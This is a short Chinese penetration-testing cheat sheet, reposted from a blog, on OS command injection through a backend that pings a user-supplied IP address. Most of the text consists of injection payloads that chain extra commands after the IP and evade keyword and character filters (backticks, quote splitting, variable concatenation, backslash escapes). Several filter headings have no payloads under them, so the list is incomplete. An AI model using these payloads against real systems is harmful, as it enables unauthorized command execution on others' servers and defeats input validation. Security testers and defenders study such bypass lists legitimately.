在渗透测试过程中,会遇见一些关于命令执行的漏洞,下面是收集的一些常用命令:
; < > <> | || & && `` () ‘ ‘
假设一种场景,从前端接收ip比如:127.0.0.1,后端对该ip进行ping测试: ping 127.0.0.1
- 没有任何防护
- 过滤了|
- 过滤了 ; |
- 过滤了 ; | &
- 过滤了 whoami关键字
ping -c 1 127.0.0.1|wh``oami - 过滤了whoami ``
ping -c 1 127.0.0.1|wh‘‘oami - 过滤了whoami `` ‘‘
ping -c 1 127.0.0.1;a=who;b=ami;$a$b - 过滤了whoami `` ‘‘ $
ping -c 1 127.0.0.1|whoam""i - 过滤了whoami `` ‘‘ $ "" ;
ping -c 1 127.0.0.1|whoam\i
原文地址:http://blog.51cto.com/13770310/2121065
时间: 2024-08-03 13:17:05